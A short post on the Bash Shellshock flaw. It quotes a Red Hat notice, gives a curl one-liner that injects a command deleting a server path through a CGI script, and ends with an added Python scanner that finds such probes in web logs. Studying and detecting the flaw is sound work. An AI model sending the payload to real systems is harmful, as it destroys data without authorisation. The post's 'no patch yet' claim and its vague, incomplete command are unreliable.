RedHat still vulnerable to Bash shellcode

RedHat customer portal

Red Hat has become aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169.


This issue (CVE-2014-6271) has not been resolved on Red Hat operating systems (i.e. no patch yet).


Once you have found a CGI script (poc.cgi), you can remove the log files with this:


curl -A "() { :; }; /bin/rm /var/www/target"
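
A request like the one above puts the function-definition prefix `() {` into a header that the web server logs, so attempts are visible in the access log. The following is an added example, not part of the original post: a scan of Apache "combined" format log lines for that prefix in the request line, Referer and User-Agent fields. The log format, the `/cgi-bin/` path, the sample lines and the function name `find_shellshock_probes` are assumptions made for illustration.

```python
import re

# Apache "combined" format (assumed):
# ip ident user [time] "request" status size "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"\s*$'
)
# Vulnerable bash treats an environment value starting with "() {" as a
# function definition. Optional whitespace is tolerated here, which is
# deliberately wider than what bash itself accepts.
FUNC_PREFIX = re.compile(r'\(\s*\)\s*\{')

def find_shellshock_probes(lines):
    """Return (ip, time, field, status) for each logged field carrying the prefix."""
    hits = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            # Unparseable line: still flag it if the marker appears anywhere.
            if FUNC_PREFIX.search(line):
                hits.append((None, None, "raw", None))
            continue
        for field in ("request", "referer", "agent"):
            if FUNC_PREFIX.search(m.group(field)):
                hits.append((m.group("ip"), m.group("time"), field,
                             int(m.group("status"))))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [25/Sep/2014:10:01:02 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Sep/2014:10:02:13 +0000] "GET /cgi-bin/poc.cgi HTTP/1.1" '
    '200 0 "-" "() { :; }; /bin/rm /var/www/target"',
    '198.51.100.7 - - [25/Sep/2014:10:02:40 +0000] "GET /cgi-bin/poc.cgi HTTP/1.1" '
    '500 0 "() { :;}; echo probe" "curl/7.30.0"',
]

if __name__ == "__main__":
    for ip, when, field, status in find_shellshock_probes(SAMPLE):
        print(f"{when} {ip} field={field} status={status}")
```

The status code is kept in each hit because it helps triage: a 200 on a CGI path deserves a closer look at the host than a 404 does.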